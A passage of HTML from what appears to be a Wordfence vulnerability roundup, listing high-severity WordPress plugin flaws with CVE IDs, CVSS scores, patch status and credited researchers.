				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62103" target="_blank" rel="noopener noreferrer">							CVE-2026-62103						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/everest-forms" target="_blank" rel="noopener">Everest Forms – Contact Form, Payment Form, Quiz, Survey &amp; Custom Form Builder with AI</a> <span class="wfvr-software-slug">[everest-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luerader" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5b8726ae82351dd0bfb38b9e77fb8b99.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5b8726ae82351dd0bfb38b9e77fb8b99"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luerader" target="_blank" rel="noopener">LueRader</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a671a264-81f6-4856-b48c-78f417e4ea0b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f7830aaf-5257-4106-a953-adc70e22a7be" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt;= 3.4.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62107" target="_blank" rel="noopener noreferrer">							CVE-2026-62107						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/355ce104d8d84334b00aeb894b98d99d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="355ce104d8d84334b00aeb894b98d99d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener">20kilograma</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f7830aaf-5257-4106-a953-adc70e22a7be" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/739b57d9-8066-4c2a-9419-f6cd9409433c" target="_blank" rel="noopener">Next-Cart Store to WooCommerce Migration &lt;= 3.9.8 &#8211; Unauthenticated Authentication Bypass via Default &#8216;__token__&#8217; Fallback in REST Migration Endpoint</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76009" target="_blank" rel="noopener noreferrer">							CVE-2026-76009						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextcart-woocommerce-migration" target="_blank" rel="noopener">Next-Cart Store to WooCommerce Migration</a> <span class="wfvr-software-slug">[nextcart-woocommerce-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/samuele-santonicola" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/102b842b1c34f4d8405d7e3bec52a813.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="102b842b1c34f4d8405d7e3bec52a813"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/samuele-santonicola" target="_blank" rel="noopener">Samuele Santonicola</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/739b57d9-8066-4c2a-9419-f6cd9409433c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55b73f5c-97cb-4f62-9155-dad8e1059894" target="_blank" rel="noopener">Site Reviews 7.2.2 &#8211; 8.2.2 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82925" target="_blank" rel="noopener noreferrer">							CVE-2026-82925						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/site-reviews" target="_blank" rel="noopener">Site Reviews</a> <span class="wfvr-software-slug">[site-reviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55b73f5c-97cb-4f62-9155-dad8e1059894" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44dab041-9c61-4830-b4e7-7d80ebc7210d" target="_blank" rel="noopener">ThemeREX Addons &lt; 2.45.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62105" target="_blank" rel="noopener noreferrer">							CVE-2026-62105						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/trx_addons" target="_blank" rel="noopener">ThemeREX Addons</a> <span class="wfvr-software-slug">[trx_addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44dab041-9c61-4830-b4e7-7d80ebc7210d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dfa094d3-e8db-4402-ad23-e161b1b6181e" target="_blank" rel="noopener">UsersWP &lt;= 1.2.70 &#8211; Authenticated (Subscriber+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19991" target="_blank" rel="noopener noreferrer">							CVE-2026-19991						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/userswp" target="_blank" rel="noopener">UsersWP – Front-end login form, User Registration, User Profile &amp; Members Directory plugin for WP</a> <span class="wfvr-software-slug">[userswp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dfa094d3-e8db-4402-ad23-e161b1b6181e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26cc2edd-c373-45a3-b3f1-cca6f702756c" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator &lt; 4.0.6 &#8211; Authenticated (Contributor+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86779" target="_blank" rel="noopener noreferrer">							CVE-2026-86779						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</a> <span class="wfvr-software-slug">[visualizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26cc2edd-c373-45a3-b3f1-cca6f702756c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/72f3a9bd-440e-4b1d-a628-ae28487e535a" target="_blank" rel="noopener">WebTotem Backups &lt;= 1.0.1 &#8211; Authenticated (Subscriber+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77006" target="_blank" rel="noopener noreferrer">							CVE-2026-77006						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wt-backups" target="_blank" rel="noopener">WebTotem Backups</a> <span class="wfvr-software-slug">[wt-backups]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/72f3a9bd-440e-4b1d-a628-ae28487e535a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1b125b0d-caf7-4685-963d-9b627ec3dbd7" target="_blank" rel="noopener">Wise Chat &lt;= 3.4 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81784" target="_blank" rel="noopener noreferrer">							CVE-2026-81784						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wise-chat" target="_blank" rel="noopener">Wise Chat</a> <span class="wfvr-software-slug">[wise-chat]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1b125b0d-caf7-4685-963d-9b627ec3dbd7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/93237020-435f-41a6-bcca-fe7b605723ae" target="_blank" rel="noopener">Bulk Password Reset &lt;= 1.3.3 &#8211; Authenticated (Subscriber+) Arbitrary Password Reset</a></h4>
<div class="cvss-score-badge">8.0</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.0 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14873" target="_blank" rel="noopener noreferrer">							CVE-2026-14873						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bulk-password-reset" target="_blank" rel="noopener">Bulk Password Reset</a> <span class="wfvr-software-slug">[bulk-password-reset]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/93237020-435f-41a6-bcca-fe7b605723ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19a9b952-84db-4911-bb50-52d74ec01cb8" target="_blank" rel="noopener">AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress &lt;= 11.0.4 &#8211; Unauthenticated Arbitrary File Read via &#8216;user[name]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77807" target="_blank" rel="noopener noreferrer">							CVE-2026-77807						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acymailing" target="_blank" rel="noopener">AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress</a> <span class="wfvr-software-slug">[acymailing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19a9b952-84db-4911-bb50-52d74ec01cb8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d79ba062-4666-41a3-a777-0ba6f63a0cb8" target="_blank" rel="noopener">Direct Download for WooCommerce &lt;= 1.19 &#8211; Unauthenticated Arbitrary File Read via &#8216;file_id&#8217; Path Segment</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15019" target="_blank" rel="noopener noreferrer">							CVE-2026-15019						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/direct-download-for-woocommerce" target="_blank" rel="noopener">Direct Download for WooCommerce</a> <span class="wfvr-software-slug">[direct-download-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d79ba062-4666-41a3-a777-0ba6f63a0cb8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f36e16a-d8e1-4315-ab7a-4d55373a7537" target="_blank" rel="noopener">ELEX WooCommerce Request a Quote &lt;= 2.4.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14962" target="_blank" rel="noopener noreferrer">							CVE-2026-14962						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elex-request-a-quote" target="_blank" rel="noopener">ELEX WooCommerce Request a Quote</a> <span class="wfvr-software-slug">[elex-request-a-quote]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f36e16a-d8e1-4315-ab7a-4d55373a7537" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b13a072-f90f-4982-b4d1-d0b9903e59ea" target="_blank" rel="noopener">Event Tickets and Registration &lt;= 5.27.4 &#8211; Missing Authorization to Unauthenticated Stripe Credentials Update</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3174" target="_blank" rel="noopener noreferrer">							CVE-2026-3174						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">Event Tickets and Registration</a> <span class="wfvr-software-slug">[event-tickets]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b13a072-f90f-4982-b4d1-d0b9903e59ea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
